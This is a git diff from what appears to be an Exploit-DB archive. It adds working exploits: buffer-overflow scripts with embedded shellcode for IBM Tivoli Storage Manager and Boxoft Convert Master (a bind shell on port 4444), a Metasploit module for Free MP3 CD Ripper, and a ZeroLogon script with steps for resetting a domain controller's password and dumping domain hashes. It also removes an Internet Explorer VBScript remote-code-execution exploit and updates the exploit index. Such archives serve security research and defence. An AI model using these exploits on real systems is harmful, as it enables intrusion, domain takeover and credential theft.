+shellcode += b"\x50\x50\x74\x43\x37\x49\x51\x58\x4f\x34\x4d"
+shellcode += b"\x77\x71\x6f\x37\x5a\x4b\x6c\x34\x35\x6b\x53"
+shellcode += b"\x4c\x35\x74\x35\x78\x73\x45\x48\x61\x6c\x4b"
+shellcode += b"\x42\x7a\x75\x74\x66\x61\x5a\x4b\x50\x66\x4c"
+shellcode += b"\x4b\x46\x6c\x70\x4b\x4e\x6b\x31\x4a\x77\x6c"
+shellcode += b"\x76\x61\x68\x6b\x4e\x6b\x53\x34\x6c\x4b\x53"
+shellcode += b"\x31\x4a\x48\x4e\x69\x37\x34\x56\x44\x65\x4c"
+shellcode += b"\x70\x61\x38\x43\x4f\x42\x45\x58\x61\x39\x38"
+shellcode += b"\x54\x6f\x79\x48\x65\x4f\x79\x59\x52\x43\x58"
+shellcode += b"\x4c\x4e\x32\x6e\x36\x6e\x7a\x4c\x72\x72\x49"
+shellcode += b"\x78\x4f\x6f\x4b\x4f\x6b\x4f\x6b\x4f\x4e\x69"
+shellcode += b"\x42\x65\x54\x44\x6f\x4b\x73\x4e\x68\x58\x4b"
+shellcode += b"\x52\x44\x33\x6c\x47\x75\x4c\x37\x54\x42\x72"
+shellcode += b"\x4d\x38\x6e\x6e\x69\x6f\x59\x6f\x49\x6f\x6d"
+shellcode += b"\x59\x57\x35\x73\x38\x70\x68\x32\x4c\x52\x4c"
+shellcode += b"\x67\x50\x71\x51\x75\x38\x65\x63\x76\x52\x76"
+shellcode += b"\x4e\x42\x44\x61\x78\x34\x35\x54\x33\x71\x75"
+shellcode += b"\x73\x42\x70\x30\x79\x4b\x6b\x38\x61\x4c\x31"
+shellcode += b"\x34\x57\x7a\x4c\x49\x59\x76\x31\x46\x69\x6f"
+shellcode += b"\x33\x65\x67\x74\x4f\x79\x6a\x62\x32\x70\x6d"
+shellcode += b"\x6b\x4d\x78\x6f\x52\x42\x6d\x4f\x4c\x6f\x77"
+shellcode += b"\x55\x4c\x75\x74\x53\x62\x79\x78\x61\x4f\x79"
+shellcode += b"\x6f\x6b\x4f\x79\x6f\x30\x68\x42\x4f\x62\x58"
+shellcode += b"\x63\x68\x77\x50\x73\x58\x70\x61\x30\x67\x33"
+shellcode += b"\x55\x50\x42\x43\x58\x32\x6d\x70\x65\x61\x63"
+shellcode += b"\x32\x53\x76\x51\x69\x4b\x6d\x58\x33\x6c\x51"
+shellcode += b"\x34\x35\x5a\x4b\x39\x6b\x53\x72\x48\x70\x58"
+shellcode += b"\x47\x50\x55\x70\x57\x50\x42\x48\x62\x50\x63"
+shellcode += b"\x47\x70\x6e\x35\x34\x34\x71\x6f\x39\x4c\x48"
+shellcode += b"\x30\x4c\x74\x64\x67\x74\x6e\x69\x4b\x51\x54"
+shellcode += b"\x71\x58\x52\x62\x72\x36\x33\x62\x71\x71\x42"
+shellcode += b"\x79\x6f\x68\x50\x74\x71\x79\x50\x76\x30\x69"
+shellcode += b"\x6f\x50\x55\x54\x48\x41\x41"
+
+buff = ""
+buff += "A" * eip_offset
+buff += struct.pack("<I",0x02c73d7b) #  0x02803d7b cause char modification needs to be written as 0x02c73d7b
+buff += shellcode
+buff += "C" * (buff_max_length - len(buff))
+
+print("Writing {} bytes".format(len(buff)))
+f = open("IBM_TSM_v.5.2.0.1_exploit.txt", "w")
+f.write(buff)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/49087.rb b/exploits/windows/local/49087.rb
new file mode 100755
index 000000000..d5a2bbeb4
--- /dev/null
+++ b/exploits/windows/local/49087.rb
@@ -0,0 +1,66 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Free MP3 CD Ripper 2.6 < 2.8 (.wma.wav.flac.m3u.acc) Buffer Overflow",
+      'Description'    => %q{
+       This module exploits a buffer overflow in Free MP3 CD Ripper versions 2.6 and 2.8.
+       By constructing a specially crafted WMA WAV M3U ACC FLAC file and attempting to convert it to an MP3 file in the
+       application, a buffer is overwritten, which allows for running shellcode.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Gionathan Reale', # Exploit-DB POC
+          'ZwX'              # Metasploit Module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2019-9767' ],
+          [ 'EDB', '45412' ],
+          [ 'URL', 'https://www.exploit-db.com/exploits/45412' ]
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [
+            'Windows 7 x86 - Windows 7 x64',
+            {
+              'Ret' => 0x66e42121 # POP POP RET
+            }
+          ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x0a\x0d\x2f"
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Sep 09 2018",
+      'DefaultTarget'  => 0))
+
+    register_options(
+    [
+      OptString.new('FILENAME', [true, 'Create malicious file example extension (.wma .wav .acc .flac .m3u)', 'name.wma'])
+    ])
+  end
+
+  def exploit
+    file_payload = payload.encoded
+
+    msfsploit = make_fast_nops(4116)
+    msfsploit << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # NSEH_JMP
+    msfsploit << [target.ret].pack("V*")  # SEH
+    msfsploit << file_payload
+    msfsploit << make_fast_nops(4440)
+
+    file_create(msfsploit)
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/local/49088.py b/exploits/windows/local/49088.py
new file mode 100755
index 000000000..2d61eb3d8
--- /dev/null
+++ b/exploits/windows/local/49088.py
@@ -0,0 +1,66 @@
+# Exploit Title: Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit
+# Date: 17.09.2020
+# Vendor Homepage: http://www.boxoft.com/
+# Software Link:   http://www.boxoft.com/convert-master/setup(boxoft-conver=t-master).exe
+# Exploit Author: Achilles
+# Tested Version: 1.3.0
+# Tested on: Windows 7 x64
+
+# 1.- Run python code :Boxoft_Convert_Master.py
+# 2.- Open Boxoft_Convert_Master.exe
+# 3.- Click try and Batch Convert Mode
+# 4.- Add Evil.wav
+# 5.- And you will have a bind shell port 4444
+# 6.- Greetings go:XiDreamzzXi,Metatron
+
+#!/usr/bin/env python
+
+import struct
+
+buffer = "\x41" * 4132
+nseh = "\xeb\x06\x90\x90" #jmp short 6
+seh  =  struct.pack('<L',0x6d00c683) #CDRip122.dll
+nops =  "\x90" * 20
+#Bind=shellcode port 4444
+shellcode = ("\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33" 
+"\xc9\xb1\x60\x83\xc2\x04\x31\x42\x15\x03\x42\x15\x79"
+"\x9c\xf2\x9b\x0c\xb0\x35\x05\x03\x97\x32\x91\x2f\x75"
+"\x92\x10\x7e\xdf\xd5\xdf\x95\x63\xd0\x24\x96\x1e\xca"
+"\xc6\x57\x4b\xd9\xe7\x3c\xe4\x1c\xa0\xd9\x7e\x72\xe4"
+"\x38\x26\xd1\x92\x88\x79\x63\x55\xe3\x94\xfe\x9a\xac"
+"\xb5\xde\xe4\x35\xbc\xd0\x9f\xe6\x92\x63\x51\x5a\xaf"
+"\xad\x1b\xb0\xf9\x6e\x46\xac\x68\xa9\x48\xce\xb8\xe1"
+"\xd2\xf5\x1a\x7d\x84\xde\xb9\x55\xa0\xe8\xe3\xd8\xb2"
+"\x31\xfb\x1a\x0b\xea\xed\xf4\x8f\xdd\xf5\x55\xbf\x1a"
+"\xa5\xe8\xd8\xfa\xde\x45\x11\x7c\x4d\xea\x87\x0f\x9f"
+"\xe5\xdf\x90\x18\x7e\x52\x1b\xd7\x24\x22\xab\x1b\xda"
+"\x31\xa2\x75\x8f\xa3\x13\x99\x20\x5e\x07\x57\x68\x3e"
+"\x10\xc7\xc2\xb0\x2b\xa0\x13\xd6\x6a\x3e\xc3\x1e\x99"
+"\x4f\xf0\xce\x63\x50\xe3\x90\x80\x3e\x0e\x9c\x39\x7e"
+"\x48\xe6\xf0\xe7\x3b\xd3\x7d\xe3\xa3\x62\x41\xee\x19"
+"\xd0\xa8\xc9\xdb\x02\x93\x0f\x34\xb0\xad\x81\x08\x57"
+"\xce\xb8\x38\xfe\x13\xc9\xe7\x40\xc2\x17\xa6\x3a\x4c"
+"\x06\x31\xfc\x3f\x8f\xcb\x85\x84\x74\x98\x9c\x63\xe5"
+"\x46\x2f\xfc\x15\x3b\x5c\x37\xd3\x36\xfc\x39\x3c\x86"
+"\x29\x32\xbb\xb3\x04\x13\x6a\xd1\xa7\x55\xac\x8e\xa8"
+"\x05\xaf\xc3\xae\x9d\xc6\x5f\xa8\x9d\x8e\x4a\x25\x3a"
+"\x35\xa3\xd7\x4c\xaa\xb1\x87\xca\x54\x6d\xdc\xb2\xf3"
+"\x3a\xaa\x29\xea\x44\x01\x4e\xb0\x08\x9a\xd0\xb5\x69"
+"\x42\xe5\xb4\x5f\x59\xff\xb4\x90\xe2\x97\x66\x09\x89"
+"\x87\x8e\xff\xa8\x21\x68\x3f\x01\xe9\xb3\x27\x63\xd2"
+"\x93\x2f\x4d\x9c\x28\x21\xd4\x9d\xad\x8f\x24\x19\xc9"
+"\x98\xbc\x24\x0b\x47\x84\x9c\x57\xd2\x20\x79\x71\x67"
+"\xe0\xd1\xcd\x40\x51\x7d\xe2\x39\xa9\xd2\x92\x4c\x24"
+"\x59\x7b\xfd\x89\x6e\xea\xec\xc8\xac\x54\x8a\x26\x60"
+"\x81\x38\x06\x32\xab\x56\x1c\xe7\xd0\x78\xe5\xa2\x75"
+"\xc8\x28\x1b\xd5\x3f\x51")
+payload = buffer + nseh + seh + nops + shellcode
+
+try:
+	f=open("Evil.wav","w")
+	print "[+] Creating %s bytes evil payload.." %len(payload)
+	f.write(payload)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/remote/46928.html b/exploits/windows/remote/46928.html
deleted file mode 100644
index 8d9519a69..000000000
--- a/exploits/windows/remote/46928.html
+++ /dev/null
@@ -1,130 +0,0 @@
-<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752                                      -->
-<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level)               -->
-<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->
-
-<!-- Tgroupcrew@gmail.com -->
-
-<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get    -->
-<!-- all the way to RCE using no shellcode.                                                     -->
-
-<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10.                              -->
-<!--    (h/t: James Forshaw, Google Project Zero)                                               -->
-
-<html>
-<meta http-equiv="x-ua-compatible" content="IE=8">
-<meta http-equiv="Expires" content="-1">
-<body>
-	<div id="container1" style="overflow:scroll; width: 10px">
-		<div id="content1" style="width:5000000px">
-			Content
-		</div>
-	</div>
-<script language="VBScript.Encode">
-Dim ar1(&h3000000)
-Dim ar2(1000)
-Dim gremlin
-addressOfGremlin = &h28281000
-Class MyClass
-	Private mValue
-	Public Property Let Value(v)
-		mValue = v
-	End Property
-	Public Default Property Get P
-		P = mValue				' Where to write
-	End Property
-End Class
-Sub TriggerWrite(where, val)
-	Dim v1
-	Set v1 = document.getElementById("container1")
-	v1.scrollLeft = val		' Write this value (Maximum: 0x001767dd)
-	Dim c
-	Set c = new MyClass
-	c.Value = where
-	Set v1.scrollLeft = c
-End Sub
-' Our vulnerability does not immediately give us an unrestricted
-' write (though we could manufacture one). For our purposes, the
-' following is sufficient. It writes an arbitrary DWORD to an
-' arbitrary location, and sets the subsequent 3 bytes to zero.
-Sub WriteInt32With3ByteZeroTrailer(addr, val)
-	TriggerWrite addr    , (val) AND &hff
-	TriggerWrite addr + 1, (val\&h100) AND &hff
-	TriggerWrite addr + 2, (val\&h10000) AND &hff
-	TriggerWrite addr + 3, (val\&h1000000) AND &hff
-End Sub
-Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str)
-	For i = 0 To Len(str) - 1
-		TriggerWrite addr + i, Asc(Mid(str, i + 1, 1))
-	Next
-End Sub
-Function ReadInt32(addr)
-	WriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr
-	ReadInt32 = ar1(gremlin)
-End Function
-Function LeakAddressOfObject(obj)
-	Set ar1(gremlin + 1) = obj
-	LeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)
-End Function
-Sub Exploit()
-	' Corrupt vt of one array element (the "gremlin")
-	TriggerWrite addressOfGremlin, &h4003	' VT_BYREF | VT_I4
-	For i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100
-		If Not IsEmpty(ar1(i)) Then
-			gremlin = i
-			Exit For
-		End If
-	Next
-	
-	If IsEmpty(gremlin) Then
-		MsgBox "Could not find gremlin"
-		Exit Sub
-	End If
-	
-	For i = 0 To UBound(ar2)
-		Set ar2(i) = CreateObject("Scripting.Dictionary")
-	Next
-	
-	Set dict = ar2(UBound(ar2) / 2)
-	addressOfDict = LeakAddressOfObject(dict)
-	vtableOfDict = ReadInt32(addressOfDict)
-	scrrun = vtableOfDict - &h11fc
-	kernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90
-	winExec = kernel32 + &h5d380
-	
-	dict.Exists "dummy"		' Make a dispatch call, just to populate pld
-	' Relocate pld to ensure its address doesn't contain a null byte
-	pld = ReadInt32(addressOfDict + &h3c)
-	fakePld = &h28281020
-	For i = 0 To 3 - 1
-		WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)
-	Next
-	
-	fakeVtable = &h28282828		' ASCII "(((("
-	For i = 0 To 21
-		If i = 12 Then		' Dictionary.Exists
-			fptr = winExec
-		Else
-			fptr = ReadInt32(vtableOfDict + 4 * i)
-		End If
-		WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr
-	Next
-	
-	WriteAsciiStringWith4ByteZeroTrailer addressOfDict, "((((\..\PowerShell.ewe -Command ""<#AAAAAAAAAAAAAAAAAAAAAAAAA"
-	WriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld
-	WriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, "#>$a = """"Start-Process cmd `""""""/t:4f /k whoami /user`"""""""""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"""
-	
-	On Error Resume Next
-	dict.Exists "dummy"		' Wheeee!!
-	
-	' A little cleanup to help prevent crashes after the exploit
-	For i = 1 To 3
-		WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict
-		WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2
-	Next
-	Erase Dict
-	Erase ar2
-End Sub
-Exploit
-</script>
-</body>
-</html>
\ No newline at end of file
diff --git a/exploits/windows/remote/49071.py b/exploits/windows/remote/49071.py
new file mode 100755
index 000000000..e3ee1df1e
--- /dev/null
+++ b/exploits/windows/remote/49071.py
@@ -0,0 +1,275 @@
+# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege
+# Date: 2020-10-04
+# Exploit Author: West Shepherd
+# Vendor Homepage: https://www.microsoft.com
+# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2
+# Tested on: Microsoft Windows Server 2016 Standard x64
+# CVE : CVE-2020-1472
+# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code
+# Sources: https://www.secura.com/pathtoimg.php?id=2055
+# Requirements: python3 and impacket 0.9.21+ (tested using this version)
+#!/usr/bin/env python3
+import hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs
+from binascii import hexlify, unhexlify
+from subprocess import check_call
+from impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED
+from impacket.dcerpc.v5 import nrpc, epm, transport
+from impacket import crypto, version
+from impacket.examples import logger
+from Cryptodome.Cipher import AES
+from struct import pack, unpack
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+
+class Exploit:
+    def __init__(
+            self,
+            name='',
+            address='',
+            attempts=2000,
+            password=''
+    ):
+        name = name.rstrip('$')
+        self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\
+            .ServerSecureChannel
+        self.authenticator = self.getAuthenticator(stamp=0)
+        self.clearNewPasswordBlob = b'\x00' * 516
+        self.primaryName = ('\\\\%s' % name) + '\x00'
+        self.accountName = ('%s$' % name) + '\x00'
+        self.computerName = name + '\x00'
+        self.clientCredential = b'\x00' * 8
+        self.clientChallenge = b'\x00' * 8
+        self.negotiateFlags = 0x212fffff
+        self.address = address
+        self.max = attempts
+        self.dce = None
+        self.sessionKey = None
+        self.clientStoredCredential = None
+        self.password = password
+
+    def encodePassword(self, password):
+        if isinstance(password, str):
+            password = password.encode('utf-8')
+        return b'\x00' * (512 - len(password))\
+               + password \
+               + pack('<L', len(password))
+
+    def getAuthenticator(self, creds=b'\x00' * 8, stamp=10):
+        authenticator = nrpc.NETLOGON_AUTHENTICATOR()
+        authenticator['Credential'] = creds
+        authenticator['Timestamp'] = stamp
+        return authenticator
+
+    def serverReqChallenge(self):
+        try:
+            binding = epm.hept_map(
+              self.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp'
+            )
+            self.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc()
+            self.dce.connect()
+            self.dce.bind(nrpc.MSRPC_UUID_NRPC)
+            return nrpc.hNetrServerReqChallenge(
+                self.dce,
+                self.primaryName,
+                self.computerName,
+                self.clientChallenge
+            )
+        except BaseException as ex:
+            self.logError(ex)
+
+    def serverAuthenticate(self):
+        try:
+            auth = nrpc.hNetrServerAuthenticate3(
+                self.dce,
+                self.primaryName,
+                self.accountName,
+                self.secureChannelType,
+                self.computerName,
+                self.clientCredential,
+                self.negotiateFlags
+            )
+            assert auth['ErrorCode'] == 0
+            self.logInfo('successfully authenticated')
+            return True
+        except nrpc.DCERPCSessionError as ex:
+            self.dce = None
+            if ex.get_error_code() == 0xc0000022:
+                return None
+            else:
+                self.logFail(ex.get_error_code())
+        except BaseException as ex:
+            self.dce = None
+            self.logFail(ex)
+        self.dce = None
+
+    def serverPasswordSet(self):
+        try:
+            return nrpc.hNetrServerPasswordSet2(
+                self.dce,
+                self.primaryName,
+                self.accountName,
+                self.secureChannelType,
+                self.computerName,
+                self.authenticator,
+                self.clearNewPasswordBlob
+            )
+        except BaseException as ex:
+            self.logError(ex)
+
+    def authenticate(self):
+        self.logInfo(
+            'checking target, attempting to authenticate %d max
+attempts' % self.max
+        )
+        for attempt in range(0, self.max):
+            self.logInfo('attempt %d' % attempt)
+            self.serverReqChallenge()
+            self.serverAuthenticate()
+            if self.dce is not None:
+                break
+        if self.dce:
+            return True
+        else:
+            self.logError('failed to authenticate')
+
+    def exploit(self):
+        self.logInfo('attempting password reset')
+        reset = self.serverPasswordSet()
+        if reset['ErrorCode'] == 0:
+            self.logInfo('successfully reset password')
+        else:
+            self.logError('failed to reset password')
+        return self
+
+    def ComputeNetlogonCredentialAES(self, challenge):
+        return nrpc.ComputeNetlogonCredentialAES(
+            challenge,
+            self.sessionKey
+        )
+
+    def logInfo(self, message):
+        sys.stdout.write("[+] %s\n" % str(message))
+        return self
+
+    def logError(self, message):
+        sys.stderr.write("[-] error %s\n" % str(message))
+
+    def logFail(self, message):
+        sys.stderr.write("[!] failure %s\n" % str(message))
+        sys.exit(2)
+
+    def restore(self):
+        self.logInfo('attempting to restore password')
+        self.clientChallenge = b'12345678'
+        try:
+            self.primaryName = NULL
+            challenge = self.serverReqChallenge()
+            self.sessionKey = nrpc.ComputeSessionKeyAES(
+                '', self.clientChallenge, challenge['ServerChallenge']
+            )
+            self.clientCredential = self.ComputeNetlogonCredentialAES(
+                self.clientChallenge
+            )
+            try:
+                self.serverAuthenticate()
+            except Exception as e:
+                if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0:
+                    raise
+            self.logInfo('restoring password')
+            self.clientStoredCredential = pack('<Q', unpack('<Q',
+self.clientCredential)[0] + 10)
+            self.authenticator = self.getAuthenticator(
+
+creds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential)
+            )
+            self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES(
+                self.encodePassword(self.password)
+            )
+            reset = self.serverPasswordSet()
+            if reset['ErrorCode'] == 0:
+                self.logInfo('successfully restored password')
+            else:
+                self.logError('failed to restore password')
+        except Exception as ex:
+            self.logError(ex)
+        return self
+
+
+if __name__ == '__main__':
+    info = """
+NOTE - Exploitation will break the DC until restored, recommended guidelines:
+
+    1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN:
+        cve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP>
+
+    2. Exploit the DC - this will break the DC until restored:
+        cve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP>
+
+    3. Dump the DC - for the DA hashes, this will not contain the
+machine hex-pass:
+        secretsdump.py -just-dc -no-pass <NETBIOS NAME>\$@<IP>
+
+    4. Dump the DC again - use the DA hash to get the machines hex-pass:
+        secretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP>
+
+    5. Restore target - this fixes the DC:
+        cve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP>
+-hex <HEXPASS>
+"""
+    parser = argparse.ArgumentParser(
+        description='CVE-2020-1472 ZeroLogon Exploit - Netlogon
+Elevation of Privilege',
+        add_help=True
+    )
+    try:
+        parser.add_argument('-do', default='check', action='store',
+                            help='What to do (default check):
+[check|restore|exploit]')
+        parser.add_argument('-target', action='store',
+                            help='NETBIOS name of target DC (not the FQDN)')
+        parser.add_argument('-ip', action='store',
+                            help='IP address of target DC')
+        parser.add_argument('-password', default='', action='store',
+                            help='The plaintext password to use to
+reset the DC')
+        parser.add_argument('-hex', default='', action='store',
+                            help='The hex password to use to restore
+the DC (recommended)')
+        parser.add_argument('-max', default=2000, action='store',
+                            help='Max attempts to authenticate with
+the DC (usually ~300 or less)')
+
+        if len(sys.argv) < 3:
+            parser.print_help()
+            print(info)
+            sys.exit(1)
+        options = parser.parse_args()
+
+        if options.do.lower() == 'check':
+            Exploit(
+                name=options.target,
+                address=options.ip,
+                attempts=int(options.max)
+            ).authenticate()
+        elif options.do.lower() == 'exploit':
+            exp = Exploit(
+                name=options.target,
+                address=options.ip,
+                attempts=int(options.max)
+            )
+            if exp.authenticate():
+                exp.exploit()
+        elif options.do.lower() == 'restore':
+            if options.hex != '' and options.password == '':
+                options.password = unhexlify(options.hex)
+            if options.password != '':
+                exp = Exploit(
+                    name=options.target,
+                    address=options.ip,
+                    password=options.password
+                ).restore()
+        else:
+            parser.print_help()
+
+    except Exception as error:
+        sys.stderr.write('[-] error in main %s\n' % str(error))
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 0c34c8ee8..4fe526b8a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6760,6 +6760,7 @@ id,file,description,date,author,type,platform,port
 48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows,
 48731,exploits/windows/dos/48731.py,"ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)",2020-08-05,MegaMagnus,dos,windows,
 48732,exploits/windows/dos/48732.py,"QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)",2020-08-05,"Luis Martínez",dos,windows,
+49083,exploits/windows/dos/49083.pl,"Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)",2020-11-19,"Vincent Wolterman",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10379,7 +10380,7 @@ id,file,description,date,author,type,platform,port
 48795,exploits/windows/local/48795.txt,"Input Director 1.4.3 - 'Input Director' Unquoted Service Path",2020-09-09,"TOUHAMI Kasbaoui",local,windows,
 48796,exploits/windows/local/48796.py,"Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH)",2020-09-09,"Felipe Winsnes",local,windows,
 48803,exploits/linux/local/48803.py,"Gnome Fonts Viewer 3.34.0 - Heap Corruption",2020-09-11,"Cody Winkler",local,linux,
-48806,exploits/windows/local/48806.txt,"Internet Explorer 11 - Use-After-Free",2020-09-11,"Simon Zuckerbraun",local,windows,
+49062,exploits/windows/local/49062.txt,"Microsoft Internet Explorer 11 - Use-After-Free",2020-11-17,maxpl0it,local,windows,
 48808,exploits/windows/local/48808.txt,"Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path",2020-09-14,LiquidWorm,local,windows,
 48810,exploits/windows/local/48810.txt,"Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path",2020-09-14,Jok3r,local,windows,
 48815,exploits/windows/local/48815.txt,"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software",2020-09-16,hyp3rlinx,local,windows,
@@ -10424,6 +10425,10 @@ id,file,description,date,author,type,platform,port
 49041,exploits/windows/local/49041.txt,"DigitalPersona 5.1.0.656 'DpHostW' - Unquoted Service Path",2020-11-13,"Teresa Q",local,windows,
 49042,exploits/windows/local/49042.txt,"SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path",2020-11-13,"Mara Ramirez",local,windows,
 49043,exploits/windows/local/49043.txt,"IDT PC Audio 1.0.6425.0 - 'STacSV' Unquoted Service Path",2020-11-13,"Isabel Lopez",local,windows,
+49047,exploits/windows/local/49047.txt,"KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path",2020-11-16,"IRVIN GIL",local,windows,
+49049,exploits/windows/local/49049.txt,"Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path",2020-11-16,"Jair Amezcua",local,windows,
+49050,exploits/windows/local/49050.txt,"Logitech Solar Keyboard Service - 'L4301_Solar' Unquoted Service Path",2020-11-16,"Jair Amezcua",local,windows,
+49053,exploits/windows/local/49053.txt,"Atheros Coex Service Application 8.0.0.255 - 'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path",2020-11-16,"Isabel Lopez",local,windows,
 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@@ -11194,6 +11199,11 @@ id,file,description,date,author,type,platform,port
 48769,exploits/windows/local/48769.py,"ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP_ASLR Bypass) (PoC)",2020-08-27,"Paras Bhatia",local,windows,
 48776,exploits/windows/local/48776.py,"BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH_ASLR_DEP)",2020-08-31,emalp,local,windows,
 48789,exploits/windows/local/48789.txt,"BarracudaDrive v6.5 - Insecure Folder Permissions",2020-09-03,boku,local,windows,
+49066,exploits/windows/local/49066.txt,"LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path",2020-11-17,"Gerardo González",local,windows,
+49084,exploits/windows/local/49084.pl,"Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)",2020-11-20,"Vincent Wolterman",local,windows,
+49086,exploits/windows/local/49086.py,"IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow",2020-11-20,"Paolo Stagno",local,windows,
+49087,exploits/windows/local/49087.rb,"Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)",2020-11-20,ZwX,local,windows,
+49088,exploits/windows/local/49088.py,"Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit",2020-11-20,stresser,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17864,6 +17874,7 @@ id,file,description,date,author,type,platform,port
 48954,exploits/hardware/remote/48954.txt,"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root",2020-10-27,LiquidWorm,remote,hardware,
 48958,exploits/hardware/remote/48958.py,"GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse",2020-10-27,LiquidWorm,remote,hardware,
 48994,exploits/hardware/remote/48994.py,"TP-Link WDR4300 - Remote Code Execution (Authenticated)",2020-11-05,"Patrik Lantz",remote,hardware,
+49057,exploits/hardware/remote/49057.py,"Cisco 7937G - DoS/Privilege Escalation",2020-11-16,"Cody Martin",remote,hardware,
